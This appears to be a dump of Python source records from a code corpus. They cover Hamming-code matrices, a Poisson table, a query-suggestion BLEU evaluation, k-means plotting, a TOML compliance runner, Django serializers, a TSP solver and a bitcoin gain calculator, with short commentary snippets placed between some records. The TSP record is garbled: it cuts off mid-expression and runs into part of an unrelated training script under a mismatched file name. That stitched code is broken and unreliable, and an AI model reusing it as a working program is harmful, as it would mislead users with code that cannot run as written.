+{"seq_id":"247561726","text":"v1 = [0,0,1,0,1,0,1]\nv2 = [1,1,0,0,1,0]\n\ndef Hamming_Distance():\n hd = 0\n if len(v1) != len(v2):\n print('These vectors are not the same length.')\n else:\n for i in range(len(v1)):\n if v1[i] != v2[i]:\n hd+=1\n \n print('The Hamming Distance is',hd)\n \n\ndef decimalToVector(i,l):\n number = bin(i)[2:]\n if l < len(number):\n print('The number of chosen bits is too little for this number.')\n else:\n vector = []\n if len(number) < l:\n d = l - len(bin(i)[2:])\n for i in range(d):\n vector.append('0')\n for i in range(len(vector)):\n vector[i] = int(vector[i])\n for i in range(len(number)):\n vector.append(int(number[i]))\n return(vector)\n\ndef vectorToDecimal(v):\n lst_v = []\n for items in v:\n lst_v.append(str(items))\n decimal = int((''.join(lst_v)),2)\n print('The decimal of this vector is',decimal)\n\n\nv = [1,1,1,0]\nG = [[1,1,1,0,0,0,0],[1,0,0,1,1,0,0],[0,1,0,1,0,1,0],[1,1,0,1,0,0,1]]\n\ndef vectorTimesMatrix(v,G):\n i = 0 \n m = 0 \n count = 0\n times = 0\n calc_vector = []\n if len(v) != len(G):\n print('Error: dimensions do not match')\n else:\n while i <= len(v):\n times += G[i][m] * v[i]\n i+=1\n if i == len(v):\n m+=1\n i=0\n count+=1\n if str(times) not in '0' and str(times) not in '1':\n times = int(bin(times)[-1])\n calc_vector.append(times)\n times = 0\n if count == len(G[0]):\n break\n print(calc_vector)\n\ndef MatrixGridPrint(G):\n for vector in G:\n row = []\n for digit in vector:\n row.append(str(digit))\n print(''.join(row))\n \n \n#function HammingG\n#input: a number r\n#output: G, the generator matrix of the (2^r-1,2^r-r-1) Hamming code\ndef hammingGeneratorMatrix(r):\n n = 2**r-1\n \n #construct permutation pi\n pi = []\n for i in range(r):\n pi.append(2**(r-i-1))\n for j in range(1,r):\n for k in range(2**j+1,2**(j+1)):\n pi.append(k)\n\n #construct rho = pi^(-1)\n rho = []\n for i in range(n):\n rho.append(pi.index(i+1))\n\n #construct H'\n global H\n H = []\n for i in range(r,n):\n H.append(decimalToVector(pi[i],r))\n\n #construct G'\n GG = [list(i) for i in zip(*H)]\n for i in range(n-r):\n GG.append(decimalToVector(2**(n-r-i-1),n-r))\n\n #apply rho to get Gtranpose\n G = []\n for i in range(n):\n G.append(GG[rho[i]])\n\n #transpose \n G = [list(i) for i in zip(*G)]\n MatrixGridPrint(G)\n \n\nm = [1,0,0,0] \ndef HammingEncoder():\n vectorTimesMatrix(m,G)\n\ndef HammingTranspose():\n HTranspose =[list(i) for i in zip(*G)]\n MatrixGridPrint(HTranspose)\n\n\n\n \n \n \n\n","sub_path":"Eddies-Code/Python/Summative/ErroCorrecting/ErrorCorrectingV1.1.py","file_name":"ErrorCorrectingV1.1.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
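Since vectorTimesMatrix above computes v*G mod 2, the (7,4) encoder can be checked by hand; a compact equivalent of that product, using the same m and G defined in the file:

G = [[1,1,1,0,0,0,0], [1,0,0,1,1,0,0], [0,1,0,1,0,1,0], [1,1,0,1,0,0,1]]
m = [1, 0, 0, 0]
# Encoding the unit message just selects G's first row.
codeword = [sum(m[i] * G[i][j] for i in range(len(m))) % 2
            for j in range(len(G[0]))]
print(codeword)  # [1, 1, 1, 0, 0, 0, 0]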
+{"seq_id":"477094492","text":"#10-14-21 KYGM\n#App that returns poisson probability distribution table\n#complete\n\nimport math\n\ncont = 1\n \n# Returns factorial of n\ndef fact(n):\n \n res = 1\n \n for i in range(2, n+1):\n res = res * i\n \n return res\n\n#Returns PPD\ndef ppd(lbd,t,x):\n ppd = (((lbd*t)**x)/(fact(x)))*math.exp((-lbd)*t)\n return ppd\n\n#input constants\nlbd = input(\"Enter Lambda: \")\nt = input(\"Enter t: \")\nli = input(\"Enter list size: \")\n\n#casting\nlbd = float(lbd)\nt = int(t)\nli = int(li)\n\nwhile cont == 1:\n \n for i in range(li + 1):\n doge = ppd(lbd,t,i)\n print(i, \": \", doge)\n \n \n cont = input(\"Enter 1 for another or 0 to end: \")\n cont = int(cont)\n \n \n\n\n","sub_path":"PPDTable.py","file_name":"PPDTable.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
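A quick sanity check on the ppd() formula above, worked by hand: with lambda*t = 2 and x = 3 the mass is (2**3 / 3!) * e**-2, roughly 0.1804, and the first eight terms already carry nearly all of the distribution:

import math

lbd, t = 2.0, 1
pmf = [((lbd * t) ** x / math.factorial(x)) * math.exp(-lbd * t) for x in range(8)]
print(round(pmf[3], 4))    # 0.1804
print(round(sum(pmf), 4))  # 0.9989 -- the tail beyond x = 7 is negligible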
+{"seq_id":"492637329","text":"###############################################################################\n# Author: Wasi Ahmad\n# Project: Neural Session Relevance Framework\n# Date Created: 7/29/2017\n#\n# File Description: This script evaluates test ranking performance.\n###############################################################################\n\nimport os, util, helper, data, multi_bleu, torch\nfrom torch.autograd import Variable\nfrom data import Session\nfrom model import NSRF\n\nargs = util.get_args()\n\n\ndef suggest_next_query(model, session_queries, session_query_length, dictionary):\n # query encoding\n embedded_queries = model.embedding(session_queries.view(-1, session_queries.size(-1)))\n encoded_queries = model.query_encoder(embedded_queries, session_query_length.view(-1).data.cpu().numpy())\n encoded_queries = model.apply_pooling(encoded_queries, model.config.pool_type)\n # encoded_queries: batch_size x session_length x (nhid_query * self.num_directions)\n encoded_queries = encoded_queries.view(*session_queries.size()[:-1], -1)\n\n # session level encoding\n sess_q_hidden = model.session_query_encoder.init_weights(encoded_queries.size(0))\n hidden_states, cell_states = [], []\n # loop over all the queries in a session\n for idx in range(encoded_queries.size(1)):\n # update session-level query encoder state using query representations\n sess_q_out, sess_q_hidden = model.session_query_encoder(encoded_queries[:, idx, :].unsqueeze(1), sess_q_hidden)\n # -1: only consider hidden states of the last layer\n if model.config.model == 'LSTM':\n hidden_states.append(sess_q_hidden[0][-1])\n cell_states.append(sess_q_hidden[1][-1])\n else:\n hidden_states.append(sess_q_hidden[0][-1])\n\n hidden_states = torch.stack(hidden_states, 1)\n hidden_states = hidden_states[:, -1, :].contiguous().view(-1, hidden_states.size(-1)).unsqueeze(0)\n if model.config.model == 'LSTM':\n cell_states = torch.stack(cell_states, 1)\n cell_states = cell_states[:, -1, :].contiguous().view(-1, cell_states.size(-1)).unsqueeze(0)\n decoder_hidden = (hidden_states, cell_states)\n else:\n decoder_hidden = hidden_states\n\n sos_token_index = dictionary.word2idx['']\n eos_token_index = dictionary.word2idx['']\n\n # First input of the decoder is the sentence start token\n decoder_input = Variable(torch.LongTensor([sos_token_index]))\n decoded_words = []\n for di in range(model.config.max_query_length + 1):\n if model.config.cuda:\n decoder_input = decoder_input.cuda()\n embedded_decoder_input = model.embedding(decoder_input).unsqueeze(1)\n decoder_output, decoder_hidden = model.decoder(embedded_decoder_input, decoder_hidden)\n topv, topi = decoder_output.data.topk(1)\n ni = topi[0][0]\n if ni == eos_token_index:\n break\n else:\n decoded_words.append(dictionary.idx2word[ni])\n decoder_input = Variable(torch.LongTensor([ni]))\n\n return \" \".join(decoded_words)\n\n\ndef evaluate(model, dictionary, session_queries):\n session = Session()\n session.queries = session_queries\n session_queries, session_query_length, rel_docs, rel_docs_length, doc_labels = helper.session_to_tensor(\n [session], dictionary, iseval=True)\n if model.config.cuda:\n session_queries = session_queries.cuda()\n session_query_length = session_query_length.cuda()\n return suggest_next_query(model, session_queries, session_query_length, dictionary)\n\n\nif __name__ == \"__main__\":\n dictionary = helper.load_object(args.save_path + 'dictionary.p')\n embeddings_index = helper.load_word_embeddings(args.word_vectors_directory, 
args.word_vectors_file,\n dictionary.word2idx)\n model = NSRF(dictionary, embeddings_index, args)\n if args.cuda:\n model = model.cuda()\n helper.load_model_states_from_checkpoint(model, os.path.join(args.save_path, 'model_best.pth.tar'), 'state_dict',\n args.cuda)\n print('model, embedding index and dictionary loaded.')\n model.eval()\n\n test_corpus = data.Corpus(args.tokenize, args.max_query_length, args.max_doc_length)\n test_corpus.parse(args.data + 'test.txt', args.max_example)\n print('test set size = ', len(test_corpus))\n\n targets, candidates = [], []\n fw = open(args.save_path + 'predictions_mmt.txt', 'w')\n for sess_len, sessions in test_corpus.data.items():\n for sess in sessions:\n for i in range(len(sess) - 1):\n target = evaluate(model, dictionary, sess.queries[:i + 1])\n candidate = \" \".join(sess.queries[i + 1].query_terms[1:-1])\n targets.append(target)\n candidates.append(candidate)\n inp = []\n for query in sess.queries[:i + 1]:\n inp.append(' '.join(query.query_terms[1:-1]))\n fw.write(', '.join(inp) + ' <:::> ' + candidate + ' <:::> ' + target + '\\n')\n fw.close()\n\n print(\"target size = \", len(targets))\n print(\"candidate size = \", len(candidates))\n multi_bleu.print_multi_bleu(targets, candidates)\n","sub_path":"multi_task_models/MNSRF/test_bleu.py","file_name":"test_bleu.py","file_ext":"py","file_size_in_byte":5219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"421608697","text":"import media\nimport fresh_tomatoes\n\ntoy_story = media.Movie(\"Toy Story\",\n                        \"A story of a boy and his toys that come to life\",\n                        \"https://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg\",\n                        \"https://www.youtube.com/watch?v=KYz2wyBy3kc\")\n\navatar = media.Movie(\"Avatar\",\n                     \"A paraplegic marine dispatched to the moon Pandora on a unique mission becomes torn between following his orders and protecting the world he feels is his home.\",\n                     \"https://images-na.ssl-images-amazon.com/images/M/MV5BMTYwOTEwNjAzMl5BMl5BanBnXkFtZTcwODc5MTUwMw@@._V1_.jpg\",\n                     \"https://www.youtube.com/watch?v=d1_JBMrrYw8\")\n\namericanPsycho = media.Movie(\"American Psycho\",\n                             \"Patrick Bateman, 27 years old, who believes in taking care of himself\",\n                             \"https://upload.wikimedia.org/wikipedia/en/6/63/Americanpsychoposter.jpg\",\n                             \"https://www.youtube.com/watch?v=RjKNbfA64EE\")\n\n'''\nTester Code:\nprint(toy_story.storyline)\navatar.show_trailer()\n'''\n\nmovies = [toy_story, avatar, americanPsycho]\nfresh_tomatoes.open_movies_page(movies)\n","sub_path":"entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"107339311","text":"#!/usr/bin/env python\n\"\"\"TOML compliance suite runner.\n\"\"\"\n\nimport argparse\nimport difflib\nimport json\nimport multiprocessing\nimport os\nimport subprocess\nimport sys\nimport textwrap\nfrom pathlib import Path\n\n\nclass Failed(Exception):\n \"\"\"Raised when a check fails for some reason\n\n :param reason:\n Textual reason, explaining why the test failed.\n :param cause:\n Exception, representing the reason for failure.\n :param diff:\n A tuple of 2 JSON-able objects, that should be presented as a diff.\n \"\"\"\n\n def __init__(self, reason, *, cause=None, diff=None):\n self.reason = reason\n\n if cause is not None:\n self.details = repr(cause)\n elif diff is not None:\n correct, got = diff\n correct_str = json.dumps(correct, indent=2, sort_keys=True)\n got_str = json.dumps(got, indent=2, sort_keys=True)\n\n diff_lines = difflib.ndiff(\n correct_str.splitlines(keepends=False),\n got_str.splitlines(keepends=False),\n )\n self.details = \"\\n\".join(diff_lines)\n else:\n self.details = None\n\n super().__init__(reason, self.details)\n\n\nclass JSONValidationError(Exception):\n \"\"\"Raised when the JSON data does not have valid types or values for the type.\n \"\"\"\n\n def __repr__(self):\n return str(self)\n\n\n# --------------------------------------------------------------------------------------\n# Colors\n# --------------------------------------------------------------------------------------\n_COLOR_ALLOWED = sys.stdout.isatty()\n# Handle optional Windows-ANSI support dependency (colorama)\nif _COLOR_ALLOWED and os.name == \"nt\":\n try:\n import colorama\n except ImportError:\n print(\n \"TIP: If you install https://pypi.org/project/colorama, this program \"\n \"will look much better.\"\n )\n _COLOR_ALLOWED = False\n else:\n colorama.init()\n\n_COLOR_NAMES = [\"grey\", \"red\", \"green\", \"yellow\", \"blue\", \"magenta\", \"cyan\", \"white\"]\n_COLOR_DICT = dict(zip(_COLOR_NAMES, range(8)))\n\n\ndef colored(s, *, fg=None, bg=None, bold=False):\n assert fg is not None or bg is not None\n if not _COLOR_ALLOWED:\n return s\n\n ansi_codes = []\n if bold:\n ansi_codes.append(1)\n if fg is not None:\n ansi_codes.append(_COLOR_DICT[fg] + 30)\n if bg is not None:\n ansi_codes.append(_COLOR_DICT[bg] + 40)\n\n parameters = \";\".join(map(str, ansi_codes))\n\n return f\"\\033[{parameters}m{s}\\033[0m\"\n\n\n# --------------------------------------------------------------------------------------\n# Filesystem interaction\n# --------------------------------------------------------------------------------------\nhere = Path(__file__).parent\n\n\ndef ensure_executable(path):\n if not os.path.isfile(path):\n raise FileNotFoundError(f\"Could not find file: {path}\")\n if not os.access(path, os.X_OK):\n raise PermissionError(f\"Not an executable file: {path}\")\n\n\ndef _locate_test_pairs():\n for path in sorted((here / \"invalid\").glob(\"*/*.toml\")):\n yield path, None\n for path in sorted((here / \"invalid\").glob(\"*/*.json\")):\n yield None, path\n\n for path in sorted((here / \"valid\").glob(\"*/*.toml\")):\n json_equivalent = path.with_suffix(\".json\")\n assert json_equivalent.exists(), f\"Missing: {json_equivalent}\"\n yield path, json_equivalent\n\n\ndef _filter_based_on_markers(pairs, markers):\n def marker_filter(pair):\n # No filtering if no markers given.\n if not markers:\n return True\n\n for m in markers:\n # Matches the name of the file (allows -m basic)\n if m in pair[0].stem:\n return True\n # Matches the name of the parent folder 
(allows -m array)\n if m == pair[0].parent.name:\n return True\n # Matches the name of the grandparent folder (allows -m invalid)\n if m == pair[0].parent.parent.name:\n return True\n return False\n\n yield from filter(marker_filter, pairs)\n\n\ndef get_test_pairs(markers):\n pairs = _locate_test_pairs()\n yield from _filter_based_on_markers(pairs, markers)\n\n\n# --------------------------------------------------------------------------------------\n# Input / Output Handling\n# --------------------------------------------------------------------------------------\ndef run_program(program, *, stdin, clean_exit):\n try:\n process = subprocess.run(\n [program], input=stdin, stdout=subprocess.PIPE, stderr=subprocess.PIPE\n )\n except OSError as error:\n raise Failed(f\"could not run: {program}\", cause=error)\n\n # For invalid Test Cases\n if clean_exit:\n if process.returncode:\n raise Failed(f\"Got a non-zero exit code: {process.returncode}\")\n if process.stderr:\n raise Failed(\"Got stderr output!\", cause=process.stderr)\n else:\n if not process.returncode:\n raise Failed(\"Should have rejected input.\")\n\n return process.stdout\n\n\ndef validate_json(obj):\n # raise JSONValidationError(\"This is what the error looks like!\\nlol\")\n pass\n\n\ndef load_json(*, content, source):\n assert source in [\"decoder's output\", \"test case input\"]\n try:\n loaded = json.loads(content)\n except json.JSONDecodeError as error:\n raise Failed(f\"Could not parse {source} JSON\", cause=error)\n\n try:\n validate_json(loaded)\n except JSONValidationError as error:\n # Note that we're passing the error as the cause here, since we want the string\n # representation (which gets formatted correctly).\n raise Failed(f\"Got incorrect JSON from {source}\", cause=error)\n\n return loaded\n\n\n# --------------------------------------------------------------------------------------\n# Actual Compliance Checks\n# --------------------------------------------------------------------------------------\ndef test_decoder(toml_file, json_file, clean_exit, decoder):\n content = run_program(decoder, stdin=toml_file.read_bytes(), clean_exit=clean_exit)\n\n # For invalid Test Cases the rejection above is the whole check.\n if json_file is None:\n return\n\n # For valid Test Cases\n correct_json = load_json(content=json_file.read_text(), source=\"test case input\")\n decoded_json = load_json(content=content, source=\"decoder's output\")\n\n if correct_json != decoded_json:\n raise Failed(\n \"Mismatch between expected JSON and decoded JSON.\",\n diff=(correct_json, decoded_json),\n )\n\n\ndef test_encoder(json_file, clean_exit, encoder, decoder):\n input_json = load_json(content=json_file.read_text(), source=\"test case input\")\n\n # Encode the input.\n result = run_program(encoder, stdin=json_file.read_bytes(), clean_exit=clean_exit)\n\n # For invalid Test Cases the rejection above is the whole check.\n if not clean_exit:\n return\n\n # Decode the result.\n decoded = run_program(decoder, stdin=result, clean_exit=True)\n\n # Check round-trip was same as original\n round_trip_json = load_json(content=decoded, source=\"decoder's output\")\n\n if input_json != round_trip_json:\n raise Failed(\n \"Mismatch between original JSON and encoded-decoded JSON.\",\n diff=(input_json, round_trip_json),\n )\n\n\n# --------------------------------------------------------------------------------------\n# Check Runners!\n# --------------------------------------------------------------------------------------\ndef _show_summary(counts):\n total = sum(counts.values())\n if total == 0:\n print(colored(\"Deselected all tests!\", fg=\"red\"))\n return\n\n n_passed = colored(\n f\"{counts['pass']} passed\", fg=\"green\" if counts[\"pass\"] else \"red\"\n )\n n_total = f\"{total} total\"\n\n print()\n print(\"Summary: \", n_passed, \", \", n_total, sep=\"\")\n\n\ndef _show_pass(name):\n print(colored(\" PASS \", fg=\"grey\", bg=\"green\"), end=\" \")\n print(colored(name, fg=\"cyan\"))\n\n\ndef _show_fail(name, failed):\n print(colored(\" FAIL \", fg=\"grey\", bg=\"red\"), end=\" \")\n print(colored(name, fg=\"cyan\"))\n\n reason = textwrap.indent(failed.reason, \" \")\n print(colored(reason, fg=\"red\"))\n if failed.details:\n print(textwrap.indent(str(failed.details), \" \"))\n\n\n# Those messy functions above keep this function clean.\ndef run_with_reporting(function, checks):\n counts = {\"fail\": 0, \"pass\": 0}\n\n for name, kwargs in checks:\n try:\n function(**kwargs)\n except Failed as e:\n _show_fail(name, e)\n counts[\"fail\"] += 1\n else:\n _show_pass(name)\n counts[\"pass\"] += 1\n\n _show_summary(counts)\n\n # This will be the program's exit code\n if counts[\"fail\"] or sum(counts.values()) == 0:\n return 1\n return 0\n\n\ndef encoder_compliance(encoder, decoder, markers):\n def generate_parameters():\n for toml_file, json_file in get_test_pairs(markers):\n if json_file is None: # need something to encode!\n continue\n yield (\n json_file,\n {\n \"json_file\": json_file,\n \"clean_exit\": toml_file is not None,\n \"encoder\": encoder,\n \"decoder\": decoder,\n },\n )\n\n ensure_executable(encoder)\n ensure_executable(decoder)\n\n return run_with_reporting(test_encoder, generate_parameters())\n\n\ndef decoder_compliance(decoder, markers):\n def generate_parameters():\n for toml_file, json_file in get_test_pairs(markers):\n if toml_file is None: # need something to decode!\n continue\n yield (\n toml_file,\n {\n \"toml_file\": toml_file,\n \"clean_exit\": json_file is not None,\n \"json_file\": json_file,\n \"decoder\": decoder,\n },\n )\n\n ensure_executable(decoder)\n return run_with_reporting(test_decoder, generate_parameters())\n\n\n# --------------------------------------------------------------------------------------\n# CLI argument handling\n# --------------------------------------------------------------------------------------\ndef get_parser():\n parser = argparse.ArgumentParser(prog=\"toml-compliance/run.py\", allow_abbrev=False)\n subparsers = parser.add_subparsers(title=\"commands\")\n\n encoder = subparsers.add_parser(\"encoder\")\n encoder.add_argument(\"target\", action=\"store\", help=\"Encoder to test\")\n encoder.add_argument(\n \"--decoder\",\n action=\"store\",\n help=\"Supporting decoder for testing\",\n required=True,\n )\n encoder.add_argument(\n \"-m\",\n metavar=\"MARKER\",\n dest=\"markers\",\n help=\"Only run tests that match given marker. Can be specified multiple times.\",\n action=\"append\",\n )\n\n decoder = subparsers.add_parser(\"decoder\")\n decoder.add_argument(\"target\", action=\"store\", help=\"Decoder to test\")\n decoder.add_argument(\n \"-m\",\n metavar=\"MARKER\",\n dest=\"markers\",\n help=\"Only run tests that match given marker. Can be specified multiple times.\",\n action=\"append\",\n )\n\n return parser\n\n\nif __name__ == \"__main__\":\n parser = get_parser()\n args = parser.parse_args()\n\n if \"target\" not in args:\n parser.print_help()\n sys.exit(1)\n\n # This check isn't super clear at first glance. 
It works since the 'decoder'\n # subparser does not have a 'decoder' argument.\n should_run_encoder_tests = \"decoder\" in args\n\n if should_run_encoder_tests:\n exit_code = encoder_compliance(args.target, args.decoder, args.markers)\n else:\n exit_code = decoder_compliance(args.target, args.markers)\n\n sys.exit(exit_code)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":11637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
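The dispatch at the bottom of run.py leans on argparse.Namespace supporting membership tests; a standalone illustration (not part of the script) of why checking "decoder" in args distinguishes the two subcommands:

import argparse

ns = argparse.Namespace(target="./my-decoder")  # what the decoder subparser yields
print("target" in ns)   # True
print("decoder" in ns)  # False -> decoder_compliance() is chosen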
+{"seq_id":"436177286","text":"from sklearn.cluster import KMeans\nfrom sklearn.decomposition import PCA\nfrom sklearn.manifold import TSNE\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#setup values\ndata = pd.read_csv('nci1.csv')\nnumber_of_rows = len(data.index)\nnumber_of_clusters = 5\ncolor_map = []\ncolor_set = ['red','blue','yellow','green','orange','purple']\n\n#Cluster Algorithm\nkmeans = KMeans(n_clusters=number_of_clusters, random_state=0).fit(data.drop(['type'], axis= 1))\nk_cluster = kmeans.labels_\n\n\n\n#set up color map based on cluster\nfor row in range(0,number_of_rows):\n color_map.append(color_set[k_cluster[row]])\n\n\n#Visulization (PCA Algorithm)\npca_3d = PCA(n_components=3)\nPCs_3d = pd.DataFrame(pca_3d.fit_transform(data.drop(['type'], axis= 1)))\n\n#Visualization (t-SNE Algorithm)\ntsne_2d = TSNE(n_components=2, perplexity=3)\nTCs_2d = pd.DataFrame(tsne_2d.fit_transform(data.drop(['type'], axis= 1)))\n\n\n#ax = plt.axes(projection =\"3d\")\n#ax.scatter3D(PCs_3d.loc[:,0],PCs_3d.loc[:,1],PCs_3d.loc[:,2], color = color_map)\nplt.scatter(PCs_3d.loc[:,0],PCs_3d.loc[:,1],c = color_map)\n\n#bx = plt.axes(projection =\"3d\")\n#bx.scatter3D(TCs_3d.loc[:,0],TCs_3d.loc[:,1], TCs_3d.loc[:,2], color = color_map)\n#plt.scatter(TCs_2d.loc[:,0],TCs_2d.loc[:,1],c = color_map)\n\n\nplt.title('PCA Dimension-Representation of Kmeans Clustering')\nplt.show()","sub_path":"Past Files/kmeans_clustering.py","file_name":"kmeans_clustering.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"533057326","text":"import sys;sys.stdin=open('input2.txt','r')\n\n\ndef tsp(now, next):  # now = current position, next = bitmask of visited customers\n    ret = dp[now][next]\n    res = float('INF')\n    if next == all:  # if we have finished through the last customer,\n        return dist[now][N+1]  # return the distance from that customer back home\n    if ret != 0:  # already visited, so return the cached value\n        return ret\n    for i in range(1, N+1):  # from customer 1 to customer N.\n        if next&(1<', max=nIters)\n\n    #print(\"aaaaaaaaaaaaaaaaa\")\n\n    for i, (input, target3D, meta) in enumerate(dataLoader):\n        #print(input.size())\n        input_var = torch.autograd.Variable(input).float().cuda()\n        # target3D_var = torch.autograd.Variable(target3D).float().cuda()\n        target3D_var = torch.autograd.Variable(meta).float().cuda()\n\n        # print(target3D_var)\n\n        output = model(input_var)\n        # reg = output[opt.nStack]\n\n        optimizer.zero_grad()\n        loss = mean_squared_error(output, target3D_var)\n        loss.backward()\n        optimizer.step()\n\n        Loss.update(loss, input.size(0))\n        #Acc.update(Accuracy((output.data).cpu().numpy(), (target3D_var.data).cpu().numpy()))\n\n        #Bar.suffix = '{split} Epoch: [{0}][{1}/{2}]| Total: {total:} | ETA: {eta:} | Loss {loss.avg:.6f} | Loss3D {loss3d.avg:.6f} | Acc {Acc.avg:.6f} | Mpjpe {Mpjpe.avg:.6f} ({Mpjpe.val:.6f})'.format(epoch, i, nIters, total=bar.elapsed_td, eta=bar.eta_td, loss=Loss, Acc=Acc, split = split, Mpjpe=Mpjpe, loss3d = Loss3D)\n        Bar.suffix = '{split} Epoch: [{0}][{1}/{2}]| Total: {total:} | ETA: {eta:} | Loss {lossa:} '.format(epoch, i, nIters, total=bar.elapsed_td, eta=bar.eta_td, lossa = Loss.avg, split=split)\n        #print(Loss.avg)\n        bar.next()\n\n        if i%500 == 0:\n            _checkpoint(model, optimizer)\n\n    bar.finish()\n\n    return Loss.avg  #, Acc.avg, Mpjpe.avg, Loss3D.avg\n\n\ndef train(epoch, opt, train_loader, model, criterion, optimizer):\n    return step('train', epoch, opt, train_loader, model, criterion, optimizer)\n\ndef val(epoch, opt, val_loader, model, criterion):\n    return step('val', epoch, opt, val_loader, model, criterion)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
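The TSP record above is cut off mid-recurrence, so here is a self-contained sketch of the same bitmask idea (the names and the start index are assumptions, not recovered text; it takes customers numbered 1..N, home at index N+1, and a full (N+2)-square dist matrix):

from functools import lru_cache

def min_tour(dist, N):
    FULL = (1 << N) - 1  # bit i-1 set <=> customer i already served

    @lru_cache(maxsize=None)
    def go(now, visited):
        if visited == FULL:
            return dist[now][N + 1]  # everyone served: head home
        best = float('inf')
        for i in range(1, N + 1):
            bit = 1 << (i - 1)
            if not visited & bit:  # customer i still unvisited
                best = min(best, dist[now][i] + go(i, visited | bit))
        return best

    return go(0, 0)  # assumes index 0 is the starting point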
+{"seq_id":"385945120","text":"from rest_framework import serializers\nfrom .models import *\n\n\nclass UserSerializer(serializers.ModelSerializer):\n\n    class Meta:\n        model = User\n        fields = ('username', 'password')\n\n\nclass UserprofileSerializer(serializers.ModelSerializer):\n    user = UserSerializer()\n\n    class Meta:\n        model = Userprofile\n        fields = ('user', 'tel', 'type', 'nickname', 'headportrait')\n\n    def to_representation(self, instance):\n        ret = super(UserprofileSerializer, self).to_representation(instance)\n        ret.pop('user')\n        ret['username'] = instance.user.username\n        return ret\n\n    def create(self, validated_data):\n        user = validated_data.pop('user')\n        user = User.objects.create_user(**user)\n        userprofile = Userprofile.objects.create(user=user, **validated_data)\n        return userprofile\n\n    def update(self, instance, validated_data):\n        # Apply the nested user fields first, then the profile's own fields.\n        user_data = validated_data.pop('user', None)\n        if user_data:\n            for attr, value in user_data.items():\n                setattr(instance.user, attr, value)\n            instance.user.save()\n        for attr, value in validated_data.items():\n            setattr(instance, attr, value)\n        instance.save()\n        return instance\n","sub_path":"backend/fangdiaocenter/fangdiaocenter/user/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
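For context, this is roughly how the nested serializer above is driven from a view; the payload values here are made up for illustration:

payload = {
    "user": {"username": "alice", "password": "s3cret"},
    "tel": "555-0100",
    "type": "1",
    "nickname": "ali",
    "headportrait": "",
}
serializer = UserprofileSerializer(data=payload)
if serializer.is_valid():
    profile = serializer.save()  # no instance passed, so this routes to create()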
+{"seq_id":"520393217","text":"# program to calculate the gain or loss on bitcoin transactions\r\n# one line of text as header followed by columns of data\r\n# Data file date, +/-coin number, cost$\r\n# 20190402,0.050,205\r\n\r\nimport csv\r\nimport sys\r\nimport os\r\nfrom datetime import date\r\nfrom decimal import *\r\n\r\n\r\ndatafile = \"test.txt\"\r\nwritefile = \"test.csv\"\r\n\r\nPrecision = 8 # number of decimal places in the data\r\n\r\n\r\n\r\ndef SortData():\r\n# separate data into 2 strings\r\n# one with sales and one with buys\r\n\r\n Buy = \"\"\r\n Sell = \"\"\r\n BuyCnt = 0\r\n SellCnt = 0\r\n with open('work.tmp', newline='') as f1:\r\n reader = csv.reader(f1)\r\n for line in reader:\r\n a1 = line[1]\r\n if a1[0] == '-':\r\n SellCnt += 1\r\n Sell = Sell + str(SellCnt) + ',' + line[0] + ',' + line[1] + ',' + line[2] + '\\n'\r\n else:\r\n BuyCnt += 1\t\t\r\n Buy = Buy + str(BuyCnt) + ',' + line[0] + ',' + line[1] + ',' + line[2] + '\\n'\t\r\n\r\n# sort the Buy and Sell strings into descending order by index numbers\r\n# assume the datafile is in chronologic order and you want to use FIFO accounting\r\n# the data would be rearanged from a chronologic order\r\n\r\n sortflag = 1\r\n while sortflag > 0:\r\n sortflag = 0\r\n cnt = 0\r\n d1 = \"\"\r\n c1 = \"\"\r\n Temp = \"\"\r\n lastflag=0\r\n passNum = 0\r\n for c in range(len(Buy)):\r\n a1 = Buy[c]\r\n if a1 == '\\n':\r\n d1 = d1 + a1\r\n cnt = 0\r\n passNum += 1\r\n if passNum == 1:\r\n c2 = c1\r\n d2 = d1\r\n if passNum > 1:\t\t\r\n c3 = c1\t\t\t\r\n d3 = d1\r\n A = int(c2)\t\t\t\t\r\n B = int(c3)\t\t\r\n if (A > B):\r\n Temp = Temp + c2 + d2\r\n c2 = c3\r\n d2 = d3\r\n lastflag=1\r\n if (A < B):\r\n Temp = Temp + c3 + d3\t\r\n sortflag = 1\t\t\t\t\t\r\n lastflag=2\r\n \t\t\t\r\n d1 = \"\"\r\n c1 = \"\"\t\t\t\r\n continue\t\t \r\n if a1 == ',':\r\n cnt = cnt + 1\r\n if cnt == 0:\r\n c1 = c1 + a1\r\n if cnt > 0:\r\n d1 = d1 + a1\r\n if lastflag == 1:\r\n Temp = Temp + c3 + d3 \t\r\n if lastflag == 2:\r\n Temp = Temp + c2 + d2\t\t\r\n Buy = Temp \t\r\n\t\r\n# filter out the index numbers before writing the new work file\r\n with open('work.tmp','w') as f2:\r\n Temp = \"\"\r\n for c in range(len(Buy)):\r\n a1 = Buy[c]\r\n if a1 == '\\n':\r\n d1 = d1 + a1\r\n Temp = Temp + d1\r\n d1 = \"\"\r\n cnt = 0\r\n if ((a1 == ',') and (cnt == 0)):\r\n cnt += 1\r\n continue\r\n if cnt > 0:\r\n d1 = d1 + a1\r\n f2.write(Temp)\r\n\r\n sortflag = 1\r\n while sortflag > 0:\r\n sortflag = 0\r\n cnt = 0\r\n d1 = \"\"\r\n c1 = \"\"\r\n Temp = \"\"\r\n lastflag=0\r\n passNum = 0\r\n for c in range(len(Sell)):\r\n a1 = Sell[c]\r\n if a1 == '\\n':\r\n d1 = d1 + a1\r\n cnt = 